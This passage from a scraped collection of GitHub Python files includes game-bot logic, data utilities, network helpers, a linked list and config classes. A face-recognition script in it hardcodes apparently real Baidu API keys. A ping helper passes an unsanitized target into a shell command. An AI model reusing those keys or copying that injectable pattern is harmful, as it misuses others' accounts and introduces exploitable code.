enemy_team)\r\n\t\tif len(possible_targets) > 2:\r\n\t\t\treturn\r\n\t\t\t\r\n\t\tfor guess in range(self.NUMBER_OF_GUESSES):\r\n\t\t\ti = random.randint(0, self.marsHeight-1)\r\n\t\t\tj = random.randint(0, self.marsWidth-1)\r\n\t\t\t\r\n\t\t\ttry:\r\n\t\t\t\ttemp_location = bc.MapLocation(bc.Planet.Mars, i, j)\r\n\t\t\t\tif gc.can_blink(unit.id, temp_location):\r\n\t\t\t\t\tgc.blink(unit.id, temp_location)\r\n\t\t\t\t\treturn\r\n\t\t\t\t\t\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint('Error:', e)\r\n\t\t\t\t# use this to show where the error was\r\n\t\t\t\ttraceback.print_exc()\r\n\r\n\tdef blink_attack_earth(self, unit):\r\n\t\tif not gc.is_blink_ready(unit.id):\r\n\t\t\treturn\r\n\t\tif bc.ResearchInfo.get_level(bc.UnitType.Mage) < 4:\r\n\t\t\treturn\r\n\t\t\t\r\n\t\tlocation = unit.location\r\n\t\t\r\n\t\tpossible_targets = gc.sense_nearby_units_by_team(location.map_location(), 2, enemy_team)\r\n\t\tif len(possible_targets) > 2:\r\n\t\t\treturn\r\n\t\t\t\t\r\n\t\tfor guess in range(self.NUMBER_OF_GUESSES):\r\n\t\t\ti = random.randint(0, self.earthHeight-1)\r\n\t\t\tj = random.randint(0, self.earthWidth-1)\r\n\t\t\t\r\n\t\t\ttry:\r\n\t\t\t\ttemp_location = bc.MapLocation(bc.Planet.Earth, i, j)\r\n\t\t\t\tif gc.can_blink(unit.id, temp_location):\r\n\t\t\t\t\tgc.blink(unit.id, temp_location)\r\n\t\t\t\t\treturn\r\n\t\t\t\t\t\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint('Error:', e)\r\n\t\t\t\t# use this to show where the error was\r\n\t\t\t\ttraceback.print_exc()\r\n","repo_name":"AnPelec/Battlecode-2018","sub_path":"Helping Modules/mage.py","file_name":"mage.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"12187640737","text":"import os\nfrom shutil import copy\n\nsource_base_dir = \"../data2/autoscout/images/\"\ndestination_base_dir = \"../data2/autoscout-data/\"\n\nfor make in os.listdir(source_base_dir):\n    make_dir = source_base_dir + make + '/'\n    # if make <= 'Buick':\n    #     print(\"Skipping make %s \" % make)\n    #     continue\n\n    for sub_d in os.listdir(make_dir):\n        model = sub_d\n        model_dir = make_dir + model + '/'\n\n        print(\"Doing %s %s\"% (make, model))\n        for f in os.listdir(model_dir):\n            destination = destination_base_dir + ( make + '-' + model ) + '/'\n            if not os.path.isdir(destination):\n                os.makedirs(destination)\n            source = model_dir + f\n            try:\n                copy(source, destination)\n            except Exception as e:\n                
print(e)\n","repo_name":"banda13/Carrecognizer","sub_path":"helpers/scout-data-preloader.py","file_name":"scout-data-preloader.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31969593929","text":"import sys\nimport itertools\nimport math\nimport collections\n\nwhich = \"sample\"\n\n\nTicket = collections.namedtuple('Ticket', 'seat buyer')\n\ndef solve(n_seats, n_buyers, tickets):\n if n_buyers != 2: return\n print(n_seats, n_buyers, tickets)\n\n by_seat = collections.defaultdict(set)\n by_buyer = collections.defaultdict(set)\n for t in tickets:\n by_seat[t.seat].add(t)\n by_buyer[t.buyer].add(t)\n\n print('seat', dict(by_seat))\n print('buyer', dict(by_buyer))\n print()\n\n\nsys.stdin = open('{}.in'.format(which))\n# sys.stdout = open('{}.out'.format(which), 'w')\n\nT = int(input())\n\nfor i in range(T):\n N, C, M = map(int, input().split())\n tickets = [\n Ticket(*(int(x) -1 for x in input().split()))\n for i in range(M)\n ]\n res = solve(N, C, tickets)\n print(\"Case #{}: {}\".format(i+1, res))\n","repo_name":"eric-wieser/codejam","sub_path":"2017/2/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26995921183","text":"\"\"\"\nFile: swift_particle_filtering.py\n\nAuthor: Christopher Rowe\nVesion: 1.0.0\nDate: 29/03/2023\n\nComputes filters for SWIFT particle datasets.\n\nPublic API:\n\n class ParticleFilter\n\nDependancies:\n\n numpy\n QuasarCode\n sph_map.py (local file)\n swift_data_expression.py (local file)\n swiftsimio\n typing\n\"\"\"\n\nimport numpy as np\nfrom QuasarCode.Tools import ScriptWrapper\nimport swiftsimio as sw\nfrom typing import List, Union\n\nfrom ..io.swift_data_expression import parse_string\nfrom ..io.swift_parttype_enum import PartType\n\nclass ParticleFilter(object):\n @staticmethod\n def _calculate_filter(data_root_node: sw.SWIFTDataset, limit_fields: Union[str, List[str]], limit_units: Union[str, List[str]], limits_min: Union[None, float, List[float]] = None, limits_max: Union[None, float, List[float]] = None, **kwargs):\n # Handle formatting for there only being one item\n if isinstance(limit_fields, str):\n limit_fields = [limit_fields]\n limit_units = [limit_units]\n if limits_min is not None:\n limits_min = [limits_min]\n if limits_max is not None:\n limits_max = [limits_max]\n\n manual_filter = np.full(parse_string(limit_fields[0], data_root_node).shape[0], True)\n\n for i, field in enumerate(limit_fields):\n field_value = parse_string(field, data_root_node).to(limit_units[i])\n if limits_min is not None and limits_min[i] is not None:\n manual_filter = manual_filter & (field_value >= limits_min[i])\n if limits_max is not None and limits_max[i] is not None:\n manual_filter = manual_filter & (field_value <= limits_max[i])\n\n return manual_filter\n\n def __init__(self, data_root_node: sw.SWIFTDataset, limit_fields: Union[str, List[str]], limit_units: Union[str, List[str]], limits_min: Union[None, float, List[float]] = None, limits_max: Union[None, float, List[float]] = None):\n self.__filter = ParticleFilter._calculate_filter(data_root_node, limit_fields, limit_units, limits_min, limits_max)\n self.__n_items = self.__filter.sum()\n\n def __call__(self, dataset):\n return dataset[self.__filter]\n \n def __len__(self):\n return self.__n_items\n\n @property\n def numpy_filter(self):\n return self.__filter\n \n def 
update(self, additional_filter: np.ndarray):\n        len_new_items = additional_filter.shape[0]\n        len_self_items = self.__filter.shape[0]\n\n        if len_new_items > len_self_items:\n            # New filter is a larger array than the current filter! This is not compatible.\n            raise ValueError(\"The new filter has a length of {}. This is larger than (and therefore, incompatible with) the current filter size of {}.\".format(len_new_items, len_self_items))\n        elif len_new_items == len_self_items:\n            # Same lengths, just do a simple logical and.\n            #print(self.__filter)\n            #print(type(self.__filter))\n            #print(self.__filter[0])\n            #print(additional_filter)\n            #print(type(additional_filter))\n            #print(additional_filter[0])\n            self.__filter = self.__filter & additional_filter\n            self.__n_items = self.__filter.sum()\n        elif len_new_items != len(self):\n            # New filter has a size that isn't consistent with the currently filtered subset.\n            raise ValueError(\"The new filter has a length of {}. This is smaller than the current filter size of {}, but also not the same as (and therefore, incompatible with) the current filtered subset size of {}.\".format(len_new_items, len_self_items, len(self)))\n        elif additional_filter.sum() > 0:\n            # Apply to the filtered subset.\n            self.__filter[np.where(self.__filter)[0][additional_filter == False]] = False\n            self.__n_items = self.__filter.sum()\n        else:\n            # New filter was valid, but would remove all items. Just overwrite internal filter.\n            self.__filter = np.full_like(self.__filter, False)\n            self.__n_items = 0\n\n    @staticmethod\n    def passthrough_filter(data_file: sw.SWIFTDataset, part_type: PartType):\n        return ParticleFilter(part_type.get_dataset(data_file), \"masses\", \"Msun\", None, None)\n\n    @staticmethod\n    def get_command_params():\n        return [[\"limit-fields\", None, \"Names (or expressions with no spaces) as a semicolon separated list of the data set to be used for filtering the list of particles.\", False, False, ScriptWrapper.make_list_converter(\";\"), None],\n                [\"limit-units\", None, \"Unit expression for the limits specified. 
Uses a semicolon separated list.\", False, False, ScriptWrapper.make_list_converter(\";\"), None],\n                [\"limits-min\", None, \"\", False, False, ScriptWrapper.make_list_converter(\";\", float), None],\n                [\"limits-max\", None, \"\", False, False, ScriptWrapper.make_list_converter(\";\", float), None]]\n    \n    @staticmethod\n    def check_limits_present(limit_fields: Union[None, str, List[str]] = None, **kwargs):\n        return limit_fields is not None\n","repo_name":"QuasarX1/PhD_HPC_Scripts","sub_path":"contra/filters/swift_particle_filtering.py","file_name":"swift_particle_filtering.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"72781496146","text":"# -*- coding:utf-8 -*-\n\"\"\"\n    net.py\n    ~~~~~~~~\n    网络相关助手函数\n\n    :author: Fufu, 2021/6/9\n\"\"\"\nimport math\nimport os\nimport re\nfrom asyncio import create_subprocess_shell, subprocess\nfrom socket import AF_INET, AF_INET6, SOCK_STREAM, socket\nfrom typing import Any, Optional, Tuple, Union\n\nfrom aiohttp import ClientSession, TCPConnector\nfrom icmplib import async_ping\nfrom loguru import logger\n\nfrom .helper import get_int, get_json_loads, get_round\n\n\nasync def request(\n        url: str,\n        method: str = 'POST',\n        *,\n        as_json: bool = True,\n        throw: bool = False,\n        **kwargs: Any,\n) -> Union[dict, Tuple[Any]]:\n    \"\"\"发起 HTTP 请求(异步)\"\"\"\n    async with ClientSession(connector=TCPConnector(ssl=False)) as client:\n        try:\n            async with client.request(method, url, **kwargs) as resp:\n                res = await resp.text()\n                return get_json_loads(res) if as_json else (res, resp.status, dict(resp.headers))\n        except Exception as e:\n            logger.debug('Exception: {}, {}: {}', e, method, url)\n            if throw:\n                raise e\n            return {} if as_json else ('', 504, {})\n\n\nasync def ping(target: str, count: int = 3, timeout: int = 1000, interval: float = 1.0):\n    \"\"\"\n    PING 目标网络, 获取延迟丢包 (备用)\n    调用 Windows/Linux 系统 PING 命令, 支持 IPv6\n\n    :param target: 目标地址\n    :param count: 发送的回显请求数\n    :param timeout: 超时时间, Windows 有效\n    :param interval: Linux 每次 PING 的时隔\n    :return:\n    \"\"\"\n    err_value = 5000\n    windows = os.name == 'nt'\n    ret = {\n        'loss': err_value,\n        'minimum': err_value,\n        'maximum': err_value,\n        'average': err_value,\n    }\n\n    if windows:\n        cmd = f'ping -w {timeout} -n {count} {target}'\n    else:\n        timeout = math.ceil(count * interval)\n        cmd = f'ping -i {interval} -c {count} -w {timeout} {target}'\n\n    process = await create_subprocess_shell(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n    # 等待该子进程运行结束\n    stdout, errout = await process.communicate()\n\n    if len(errout) > 0:\n        return ret\n\n    # 运行结果\n    res = stdout.decode('gbk', 'ignore').strip()\n\n    # 丢包率 %\n    loss = re.findall(r'(\\d+)%', res)\n    if loss:\n        ret['loss'] = get_round(loss[0], err_value)\n\n    # 延迟\n    patt = r'(\\d+)ms.*? (\\d+)ms.*? 
\n    delay = re.findall(patt, res)\n    if delay and len(delay[0]) == 3:\n        delay = [get_round(x, err_value) for x in delay[0]]\n        ret['minimum'] = delay[0]\n        if windows:\n            ret['maximum'] = delay[1]\n            ret['average'] = delay[2]\n        else:\n            ret['maximum'] = delay[2]\n            ret['average'] = delay[1]\n\n    return ret\n\n\nasync def pyping(target: str, count: int = 3, timeout: float = 0.7, interval: float = 0.1):\n    \"\"\"\n    PING the target network to get latency and packet loss\n    Based on icmplib, supports IPv6\n\n    :param target: target address\n    :param count: number of echo requests to send\n    :param timeout: timeout\n    :param interval: interval between pings on Linux\n    :return:\n    \"\"\"\n    host = await async_ping(target, count=count, timeout=timeout, interval=interval)\n    if host.is_alive:\n        return {\n            'loss': get_round(host.packet_loss * 100),\n            'minimum': host.min_rtt,\n            'maximum': host.max_rtt,\n            'average': host.avg_rtt,\n        }\n\n    return {\n        'loss': 100,\n        'minimum': 5000,\n        'maximum': 5000,\n        'average': 5000,\n    }\n\n\ndef chk_port(\n        ip: Union[str, tuple, list],\n        port: Optional[int] = None,\n        as_ipv6: bool = False,\n        timeout: int = 5,\n) -> Tuple[bool, int]:\n    \"\"\"\n    Check TCP port connectivity\n\n    e.g.::\n\n        chk_port('baidu.com', 443)\n        chk_port('baidu.com:443')\n        chk_port(('baidu.com', 443))\n        chk_port('baidu.com')\n        chk_port('[::1]:443', as_ipv6=True)\n\n    :param ip:\n    :param port: defaults to 80\n    :param as_ipv6:\n    :param timeout: timeout in seconds\n    :return:\n    \"\"\"\n    if not port:\n        ip_port = ip if isinstance(ip, (list, tuple)) else str(ip).rsplit(':', 1)\n        ip, port = ip_port if len(ip_port) > 1 else (ip_port, None)\n\n    try:\n        with socket(AF_INET6 if as_ipv6 else AF_INET, SOCK_STREAM) as s:\n            s.settimeout(get_int(timeout, 5))\n            x = s.connect_ex((str(ip), get_int(port, 80)))\n            s.settimeout(None)\n            return x == 0, x\n    except Exception:\n        pass\n\n    return False, -1\n","repo_name":"fufuok/PyAgent","sub_path":"src/libs/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} {"seq_id":"4823633840","text":"\"\"\"Multi-face recognition on a local group photo using the Baidu Cloud API and a face library\"\"\"\nfrom aip import AipFace\nimport base64\nimport dlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math,cv2\nimport os, glob,math\nfrom skimage import io\n\n\"\"\"\nFacial landmark detection\n\"\"\"\n\n\n\n\ndef rect_to_bb(rect): # get the coordinate info of the face rectangle\n    x = rect.left()\n    y = rect.top()\n    w = rect.right() - x\n    h = rect.bottom() - y\n    return (x, y, w, h)\n\n\"\"\"\nFace alignment\n\"\"\"\ndef face_alignment(faces):\n    predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\") # used to predict the landmarks\n    faces_aligned = []\n    for face in faces:\n        rec = dlib.rectangle(0,0,face.shape[0],face.shape[1])\n        shape = predictor(np.uint8(face),rec) # note: the input must be of type uint8\n        \n        order = [36,45,30,48,54] # left eye, right eye, nose, left mouth, right mouth; note the order of the landmarks, which can be found online\n        for j in order:\n            x = shape.part(j).x\n            y = shape.part(j).y\n            #cv2.circle(face, (x, y), 2, (0, 0, 255), -1) # test with and without this\n\n        eye_center =((shape.part(36).x + shape.part(45).x) * 1./2, # compute the center coordinates of the two eyes\n                  (shape.part(36).y + shape.part(45).y) * 1./2)\n        dx = (shape.part(45).x - shape.part(36).x) # note: right - right\n        dy = (shape.part(45).y - shape.part(36).y)\n\n        angle = math.atan2(dy,dx) * 180. / math.pi # compute the angle
\n        RotateMatrix = cv2.getRotationMatrix2D(eye_center, angle, scale=1) # compute the affine matrix\n        RotImg = cv2.warpAffine(face, RotateMatrix, (face.shape[0], face.shape[1])) # apply the affine transform, i.e. rotate\n        faces_aligned.append(RotImg)\n    return faces_aligned\n\ndef feature(path,foces):\n    im_raw =cv2.imread(foces).astype('uint8') \n    detector = dlib.get_frontal_face_detector()\n    gray = cv2.cvtColor(im_raw, cv2.COLOR_BGR2GRAY)\n    rects = detector(gray, 1)\n    src_faces = []\n    for (i, rect) in enumerate(rects):\n        (x, y, w, h) = rect_to_bb(rect)\n        detect_face = im_raw[y:y+h,x:x+w]\n        src_faces.append(detect_face)\n        cv2.rectangle(im_raw, (x, y), (x + w, y + h), (0, 255, 0), 2)\n        cv2.putText(im_raw, \"Face: {}\".format(i + 1), (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n    faces_aligned = face_alignment(src_faces)\n    #cv2.imshow(\"src\", im_raw) \n    for j in os.listdir(path): # clear the files in the directory of faces separated from the group photo\n        os.remove(path+'\\\\'+j) \n    i = 0\n    for face in faces_aligned:\n        #cv2.imshow(\"det_{}\".format(i), face)\n        i = i + 1 \n        io.imsave(path+'\\\\'+'Face{}.jpg'.format(i),face)\n    #cv2.imshow(\"Output\", im_raw)\n    cv2.waitKey(0)\n\ndef AipFaceRecognition(pathfile):\n    \n    with open(pathfile,\"rb\") as f: \n        # b64encode performs the encoding\n        base64_data = base64.b64encode(f.read())\n    image = str(base64_data,'utf-8')\n    imageType = \"BASE64\" # 3 kinds; also \"URL\", \"FACE_TOKEN\"\n    groupIdList = \"qq\" # the user group ID of the photos you uploaded to the Baidu face library is named \"qq\"\n    \"\"\" Call face search \"\"\"\n    a=client.search(image, imageType,groupIdList) \n    #print(a['user_list'][2][ 'user_id'],a['user_list'][3][ 'score'])\n    return a #['result']['user_list'][0]['user_id']\n\n\nif __name__ == \"__main__\":\n    focePath=r'C:\\\\Users\\\\Administrator\\\\Desktop\\\\1234.jpg' # group photo\n    \"\"\"Subdirectory of faces separated from the group photo\"\"\"\n    path = r'zkk' \n    \"\"\" Your APPID AK SK \"\"\"\n    APP_ID = '15427306'\n    API_KEY = 'MUlz7ihrX5BiKcOLo6EGRfbq'\n    SECRET_KEY = 'vt0Ob07UWpgOiyiKceacv0IqAzACxsCy'\n    client = AipFace(APP_ID, API_KEY, SECRET_KEY)\n    \n    feature(path,focePath)\n    userlist=[]\n    for i in os.listdir(path):\n        pathfile=path+'\\\\'+i\n        A=AipFaceRecognition(pathfile)\n        if A.get('result',None) !=None:\n            if A['result']['user_list'][0]['score']>50: # keep similarity scores above 50%\n                #print('Photo {} matches {} with score {}'.format(i,A['result']['user_list'][0]['user_id'],A['result']['user_list'][0]['score']))\n                print('Photo {} matches {}'.format(i,A['result']['user_list'][0]['user_id']))\n    \n","repo_name":"smists/face","sub_path":"face1.py","file_name":"face1.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"35914715648","text":"class Node:\r\n    \"\"\"\r\n    A class for a node in a singly-linked list, storing\r\n    a data payload and links to next node.\r\n    \"\"\"\r\n\r\n    def __init__(self, data = None, next = None):\r\n        \"\"\"Initialize the node with data payload and link to next node.\"\"\"\r\n        self.data = data\r\n        self.next = next\r\n\r\n    def getdata(self):\r\n        \"\"\"Get the node's data payload.\"\"\"\r\n        return self.data\r\n\r\n    def setdata(self, data = None):\r\n        \"\"\"Set the node's data payload.\"\"\"\r\n        self.data = data\r\n\r\n    def getnext(self):\r\n        \"\"\"Get the next linked node.\"\"\"\r\n        return self.next\r\n\r\n    def setnext(self, node = None):\r\n        \"\"\"Set the next linked node.\"\"\"\r\n        self.next = node\r\n\r\nclass LinkedList:\r\n    \"\"\"\r\n    A singly linked list.\r\n    \"\"\"\r\n\r\n    def __init__(self, data=None, head=None):\r\n        self.data = data\r\n        self.head = head\r\n    \r\n    def __iter__(self):\r\n        \"\"\"Returns a forward iterator over the list.\"\"\"\r\n        node = self.head\r\n        while node is not None:
\r\n            yield node.getdata()\r\n            node = node.getnext()\r\n\r\n    def __str__(self):\r\n        \"\"\"Returns a string representation of the list.\"\"\"\r\n        return \" -> \".join([str(x) for x in self])\r\n\r\n    def __repr__(self):\r\n        \"\"\"Returns a printable representation of the list.\"\"\"\r\n        return str(self)\r\n\r\n    def __len__(self):\r\n        \"\"\"Returns the length of the list.\"\"\"\r\n        size = 0\r\n        for i in self:\r\n            size += 1\r\n        return size\r\n    def push(self, data):\r\n        \"\"\"\r\n        Adds a new item to the end of the list.\r\n        param data: The new item to append to the list.\r\n        returns: None\r\n        \"\"\"\r\n        if self.head is None:\r\n            node = Node()\r\n            node.setdata(data)\r\n            node.setnext(None)\r\n            self.head = node\r\n\r\n        else:\r\n            node = Node()\r\n            node.setdata(data)\r\n            itr = self.head\r\n            while itr.next:\r\n                itr = itr.next\r\n            itr.next = node\r\n\r\ndef mergeLists(baseList, tailList):\r\n    itr = baseList.head\r\n    while itr.next:\r\n        itr = itr.next\r\n    itr.next = tailList.head\r\n    return baseList\r\n\r\n\r\ndef intersection(listA, listB):\r\n    lenA = len(listA)\r\n    lenB = len(listB)\r\n    offset = abs(lenA-lenB)\r\n    print(\"Offset: \",offset)\r\n    currA = listA.head\r\n    currB = listB.head\r\n    ## length of listA greater than listB; then offset the listA\r\n    if lenA > lenB:\r\n        for i in range(offset):\r\n            currA = currA.next\r\n    ## length of listB greater than listA; then offset the listB\r\n    elif lenB > lenA:\r\n        for i in range(offset):\r\n            currB = currB.next\r\n    #print(currA.data)\r\n    #print(currB.data)\r\n    while currA != None:\r\n    #while currA.next:\r\n        if currA == currB:\r\n            return currA\r\n        else:\r\n            currA = currA.next\r\n            currB = currB.next\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    mergeList = LinkedList()\r\n    #mergeList.push(130)\r\n    #mergeList.push(180)\r\n    mergeList.push(190)\r\n\r\n    listA = LinkedList()\r\n    listA.push(10)\r\n    listA.push(11)\r\n    listA.push(13)\r\n    listA.push(12)\r\n    listA.push(15)\r\n    listA.push(16)\r\n    listA.push(18)\r\n    listA=mergeLists(listA,mergeList)\r\n\r\n    listB = LinkedList()\r\n    listB.push(14)\r\n    listB.push(17)\r\n    listB.push(19)\r\n    listB.push(20)\r\n    listB=mergeLists(listB,mergeList)\r\n    \r\n\r\n    ##two lists created listA and listB\r\n    print(\"List A: \",listA)\r\n    print(\"List A length\",len(listA))\r\n    print(\"List B: \",listB)\r\n    print(\"List B length\",len(listB))\r\n    common = intersection(listA, listB)\r\n    #print(\"First Common: \",intersection(listA, listB).data)\r\n    #print(\"First Common: \",intersection(listA, listB))\r\n    print(\"First Common element data: \",common.data)\r\n    print(\"First Common element: \",common)","repo_name":"deena-dayalan/algorithm","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"11700791084","text":"from __future__ import division, print_function\n\n# Import Python modules\nimport os\nimport sys\n\n# Import Broadband modules\nimport cc\nimport bband_utils\n\nclass BBToolboxCfg(object):\n    \"\"\"\n    Define the configuration parameters for the SDSU BBToolbox program\n    \"\"\"\n    cfgdict = {}\n\n    def getval(self, attr):\n        try:\n            val = self.cfgdict[attr]\n        except KeyError:\n            print(\"Invalid Source File - Missing attribute: %s\" % (attr))\n            print(\"Exiting\")\n            sys.exit(1)\n        return val\n\n    def parse_src(self, a_srcfile):\n        \"\"\"\n        This function calls bband_utils's parse property file function\n        to get a dictionary of key, value pairs and then looks for\n        the parameters needed by bbtoolbox
\n        \"\"\"\n        self.cfgdict = bband_utils.parse_properties(a_srcfile)\n\n        val = self.getval(\"depth_to_top\")\n        self.DEPTH_TO_TOP = float(val)\n\n        val = self.getval(\"fault_length\")\n        self.LENGTH = float(val)\n\n        val = self.getval(\"dip\")\n        self.DIP = float(val)\n\n        val = self.getval(\"rake\")\n        self.RAKE = float(val)\n\n        val = self.getval(\"hypo_along_stk\")\n        self.HYPO_ALONG_STK = float(val)\n\n        val = self.getval(\"hypo_down_dip\")\n        self.HYPO_DOWN_DIP = float(val)\n\n        val = self.getval(\"magnitude\")\n        self.MAG = float(val)\n\n        val = self.getval(\"seed\")\n        self.SEED = int(float(val))\n\n        # Now look for the optional grid parameters\n        if 'grid_x' in self.cfgdict:\n            self.grid_x = float(self.getval(\"grid_x\"))\n        if 'grid_y' in self.cfgdict:\n            self.grid_y = float(self.getval(\"grid_y\"))\n        if 'grid_z' in self.cfgdict:\n            self.grid_z = float(self.getval(\"grid_z\"))\n\n        #\n        # Read parameters out of the source file to obtain parameters\n        # needed by the BBcoda codes\n        #\n        fcodes = cc.find_fx_fy_fz(self.HYPO_ALONG_STK,\n                                  self.LENGTH,\n                                  self.DIP,\n                                  self.HYPO_DOWN_DIP,\n                                  self.DEPTH_TO_TOP)\n        self.fsx = fcodes[0]\n        self.fsy = fcodes[1]\n        self.fsz = fcodes[2]\n        #print (\"ETH conversion from hypalongstk: \"\n        #       \"%f flength: %f dip: %f hypdowndip: %f depthtotop: %f\\n\" %\n        #       (self.HYPO_ALONG_STK,\n        #        self.LENGTH,\n        #        self.DIP,\n        #        self.HYPO_DOWN_DIP,\n        #        self.DEPTH_TO_TOP))\n        #print (\"resulting fsx: %f fxy: %f fsz: %s\\n\" % (self.fsx,\n        #                                                self.fsy,\n        #                                                self.fsz))\n\n    def calculate_stress(self):\n        \"\"\"\n        This function calculates the stress parameters for SDSU based\n        on the depth of the fault. These values are calibrated for use\n        in Eastern North America\n        \"\"\"\n        stress = 16.0 * self.DEPTH_TO_TOP + 225\n        stress = stress * 10**6\n\n        return stress\n\n    def __init__(self, a_srcfile=None):\n        \"\"\"\n        Set up some parameters for BBToolbox\n        \"\"\"\n        self.MAG = None\n        self.grid_x = None\n        self.grid_y = None\n        self.grid_z = 125.0\n        self.copy_lf_seismograms = True\n\n        # Parse src file, if given\n        if a_srcfile:\n            self.parse_src(a_srcfile)\n\n        self.MODALITY = 1\n        # GS_FLAG: Don't change it here, override it in the velocity\n        # model config file using a 'CODEBASE_SDSU_GS_FLAG = XXX' line\n        # 1: Western US (active region),\n        # 2: Eastern NA (stable region),\n        # 3: Japan\n        self.GS_FLAG = 1\n        # NGAW_FLAG: Don't change it here, override it in the velocity\n        # model config file using a 'CODEBASE_SDSU_NGAW_FLAG = XXX' line\n        # 1: NGA-WEST1\n        # 2: NGA-WEST2\n        self.NGAW_FLAG = 2\n        self.KAPPA = 0.04\n        self.Q_CODA = 150.0\n        self.FDEC = 0.8\n        self.AFAC = 41.0\n        self.BFAC = 34.0\n        self.SOURCE_MECH = \"rs\"\n        self.SOURCE_FUNC = \"dreg\"\n        self.VERBOSE = \"on\"\n        self.TR_SCA = 0.075\n        self.STR_FAC = 50.e6\n\n        # 06/10/11: Sandarsh MK\n        # Note: Setting FMAX = 20.00 Hz will\n        # cause BBtoolbox to produce NaNs in 000 and 090 seismograms.\n        self.FMAX = 100.00\n\n        # 09/22/2020: Correlation flag\n        # 0: Do not include correlation\n        # 1: Include only inter-frequency correlation\n        # 2: Include spatial correlation\n        self.corr_flag = 0\n\nif __name__ == \"__main__\":\n    BBCODA2 = BBToolboxCfg()\n    print(\"Created Test Config Class: %s\" % (os.path.basename(sys.argv[0])))\n","repo_name":"SCECcode/bbp","sub_path":"bbp/comps/bbtoolbox_cfg.py","file_name":"bbtoolbox_cfg.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} {"seq_id":"21028207231","text":"# Modules used to create the server\nimport socketserver\n\n\nclass MySelfServer(socketserver.BaseRequestHandler):  # Step 1: create your own server class, inheriting from BaseRequestHandler
\n\n    # Override the handle method of BaseRequestHandler; simply write it inside your own class\n    def handle(self):  # contains all the interaction between the server side and the client\n        while True:\n\n            # Receive data\n            self.data = self.request.recv(1024).strip()\n\n            # Print the client's IP address and the data it sent; you might ask where the self.client_address parameter comes from: it is set in the parent class constructor\n            print(\"{} wrote:\".format(self.client_address[0]))\n            print(self.data)\n\n            # Check whether the client has disconnected\n            if not self.data:\n                print(self.client_address, 'connection closed!')  # waiting to receive but getting nothing means the client disconnected\n                break\n\n            # Send the received data back in uppercase\n            self.request.sendall(self.data.upper())\n\n\nif __name__ == \"__main__\":\n    HOST, PORT = \"\", 9999\n\n    # Step 2: instantiate one of the four server classes, passing in the server address and the server class created above; here the TCPServer variant is instantiated\n    server = socketserver.ThreadingTCPServer((HOST, PORT), MySelfServer)\n\n    # Handle multiple requests; note that although multiple requests are handled, this line alone does not implement concurrency\n    server.serve_forever()","repo_name":"neodeng23/python_tcp_socket","sub_path":"socketserver_demo/mult_server.py","file_name":"mult_server.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"40711862648","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\n@dataclass\nclass FileEncryptionInfo(AdditionalDataHolder, BackedModel, Parsable):\n    \"\"\"\n    Contains properties for file encryption information for the content version of a line of business app.\n    \"\"\"\n    # Stores model information.\n    backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n    # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n    additional_data: Dict[str, Any] = field(default_factory=dict)\n    # The key used to encrypt the file content.\n    encryption_key: Optional[bytes] = None\n    # The file digest prior to encryption. ProfileVersion1 requires a non-null FileDigest.\n    file_digest: Optional[bytes] = None\n    # The file digest algorithm. ProfileVersion1 currently only supports SHA256 for the FileDigestAlgorithm.\n    file_digest_algorithm: Optional[str] = None\n    # The initialization vector (IV) used for the encryption algorithm. Must be 16 bytes.\n    initialization_vector: Optional[bytes] = None\n    # The hash of the concatenation of the IV and encrypted file content. Must be 32 bytes.\n    mac: Optional[bytes] = None\n    # The key used to compute the message authentication code of the concatenation of the IV and encrypted file content. Must be 32 bytes.\n    mac_key: Optional[bytes] = None\n    # The OdataType property\n    odata_type: Optional[str] = None\n    # The profile identifier. Maps to the strategy used to encrypt the file.
